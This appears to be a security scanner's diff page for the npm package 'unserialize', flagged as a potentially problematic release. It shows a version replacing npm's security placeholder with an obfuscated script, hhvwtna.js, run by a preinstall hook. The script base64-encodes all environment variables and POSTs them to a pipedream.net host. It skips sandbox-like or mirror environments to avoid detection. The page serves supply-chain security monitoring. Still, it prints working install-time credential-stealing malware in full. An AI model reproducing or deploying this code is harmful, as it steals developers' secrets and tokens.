unserialize 0.0.1-security → 1.801.324

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of unserialize might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/hhvwtna.js +1 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/hhvwtna.js ADDED
@@ -0,0 +1 @@
1
+ const a0_0x4a42a7=a0_0x2a67;function a0_0x1353(){const _0x5df1ee=['write','pipedream','2558822XxlGSg','1268384ff816fb002f65302287b639ce','join','daasadmin','some','includes','npm_package_name','registry.npmmirror.com','95724yqXaIj','392sChyaX','keys','npm_config_registry','699812BYeMNn','1543856gLWyWf','/usr/bin/python','toString','length','12oymwgV','USERNAME','3121090khuDrz','end','https','147515PrXqGa','request','POST','taobao.org','from','stringify','tencent.com','1894308eXHTwE','base64'];a0_0x1353=function(){return _0x5df1ee;};return a0_0x1353();}(function(_0x3cde8f,_0x3961a3){const _0x1c4319=a0_0x2a67,_0x52f5e9=_0x3cde8f();while(!![]){try{const _0x352256=parseInt(_0x1c4319(0x84))/0x1+parseInt(_0x1c4319(0x99))/0x2+-parseInt(_0x1c4319(0x95))/0x3+parseInt(_0x1c4319(0x85))/0x4+parseInt(_0x1c4319(0x8e))/0x5*(-parseInt(_0x1c4319(0x89))/0x6)+-parseInt(_0x1c4319(0x8b))/0x7+parseInt(_0x1c4319(0xa2))/0x8*(-parseInt(_0x1c4319(0xa1))/0x9);if(_0x352256===_0x3961a3)break;else _0x52f5e9['push'](_0x52f5e9['shift']());}catch(_0x56f43d){_0x52f5e9['push'](_0x52f5e9['shift']());}}}(a0_0x1353,0xacc7f));function a0_0x2a67(_0x3f3dbf,_0x239c0c){const _0x135375=a0_0x1353();return a0_0x2a67=function(_0x2a6764,_0x4933c9){_0x2a6764=_0x2a6764-0x82;let _0x3b780a=_0x135375[_0x2a6764];return _0x3b780a;},a0_0x2a67(_0x3f3dbf,_0x239c0c);}const http=require(a0_0x4a42a7(0x8d)),filter=[{'key':'npm_config_registry','val':a0_0x4a42a7(0x91)},{'key':a0_0x4a42a7(0x83),'val':a0_0x4a42a7(0x94)},{'key':a0_0x4a42a7(0x83),'val':a0_0x4a42a7(0xa0)},{'key':a0_0x4a42a7(0x8a),'val':a0_0x4a42a7(0x9c)},{'key':'_','val':a0_0x4a42a7(0x86)}];function main(){const _0x3cd956=a0_0x4a42a7;var _0x2dd0ac=process['env']||{};if(filter[_0x3cd956(0x9d)](({key:_0x30ac0f,val:_0x58db63})=>_0x2dd0ac[_0x30ac0f]&&_0x2dd0ac[_0x30ac0f][_0x3cd956(0x9e)](_0x58db63))||Object[_0x3cd956(0x82)](_0x2dd0ac)[_0x3cd956(0x88)]<0xa)return;req=http[_0x3cd956(0x8f)]({'host':[_0x3cd956(0x9a),'m',_0x3cd956(0x98),'net'][_0x3cd956(0x9b)]('.'),'path':'/'+(_0x2dd0ac[_0x3cd956(0x9f)]||''),'method':_0x3cd956(0x90)})['on']('error',function(_0xcb52e7){}),req[_0x3cd956(0x97)](Buffer[_0x3cd956(0x92)](JSON[_0x3cd956(0x93)](_0x2dd0ac))[_0x3cd956(0x87)](_0x3cd956(0x96))),req[_0x3cd956(0x8c)]();}main();
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "unserialize",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.801.324",
4
+ "main": "hhvwtna.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "node hhvwtna.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=unserialize for more information.